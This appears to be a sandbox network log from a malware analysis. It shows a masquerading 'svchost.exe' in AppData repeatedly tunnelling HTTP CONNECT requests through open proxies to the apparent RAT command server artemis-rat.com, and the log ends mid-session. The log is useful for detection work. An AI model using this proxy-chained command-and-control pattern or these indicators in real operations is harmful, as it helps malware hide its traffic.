Mar 9, 2024 13:14:32.875904083 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3004	192.168.2.5	59177	162.241.6.97	63360	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.880703926 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.020174980 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3005	192.168.2.5	59644	8.219.179.237	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.883260012 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3006	192.168.2.5	58745	199.229.254.129	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.887248039 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3007	192.168.2.5	59717	23.137.248.197	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.888612986 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3008	192.168.2.5	59552	123.241.210.123	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.894399881 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3009	192.168.2.5	59681	185.110.190.99	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.898149967 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3010	192.168.2.5	59804	199.188.93.214	9000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.904536009 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3011	192.168.2.5	59450	117.160.250.163	9990	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.905230999 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.591082096 CET	303	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 09 Mar 2024 12:14:33 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3012	192.168.2.5	59792	110.12.211.140	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.978420973 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3013	192.168.2.5	59791	45.138.87.238	1080	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.990303040 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3014	192.168.2.5	59189	43.131.248.165	15673	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.007445097 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3015	192.168.2.5	59760	81.169.187.194	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.066173077 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.384543896 CET	474	IN	HTTP/1.1 405 Method Not Allowed Date: Sat, 09 Mar 2024 12:14:33 GMT Server: Apache Allow: GET,POST,OPTIONS,HEAD Content-Length: 290 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 43 4f 4e 4e 45 43 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method CONNECT is not allowed for this URL.</p><hr><address>Apache Server at artemis-rat.com Port 443</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3016	192.168.2.5	57296	45.117.179.179	17827	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.074310064 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.846127033 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3017	192.168.2.5	59106	51.75.125.208	27029	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.077893019 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.833451986 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.834131002 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.833703995 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3018	192.168.2.5	59677	193.136.97.17	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.078084946 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.621074915 CET	536	IN	HTTP/1.1 500 Internal Server Error Date: Sat, 09 Mar 2024 12:14:34 GMT Server: Apache/2.4.56 (Debian) Content-Length: 614 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of
Mar 9, 2024 13:14:34.621094942 CET	270	IN	Data Raw: 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 Data Ascii: the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.56 (Debian) Server at artemis-rat.com Port 44

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3019	192.168.2.5	59736	43.133.136.208	8800	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.078341007 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3020	192.168.2.5	57480	188.164.196.31	62966	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.078455925 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.846157074 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3021	192.168.2.5	59749	27.65.114.8	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.078555107 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3022	192.168.2.5	59819	172.67.181.58	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.079010963 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.233458042 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:33 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3023	192.168.2.5	59823	104.18.161.122	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.079121113 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.233550072 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:33 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3024	192.168.2.5	59825	104.24.236.203	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.079488039 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.233937025 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:33 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3025	192.168.2.5	59088	128.127.94.160	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.080274105 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3026	192.168.2.5	59806	104.167.6.218	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.080276012 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.677175999 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.380640030 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.677978039 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.177860975 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3027	192.168.2.5	59080	5.10.249.159	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.081154108 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.547741890 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.177689075 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3028	192.168.2.5	59798	14.103.24.20	8000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.081386089 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3029	192.168.2.5	57580	162.214.225.223	54917	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.081967115 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.177423000 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3030	192.168.2.5	59839	104.20.89.77	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.082856894 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.237307072 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:33 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3031	192.168.2.5	58983	220.194.189.144	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.084697962 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3032	192.168.2.5	57671	35.209.198.222	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
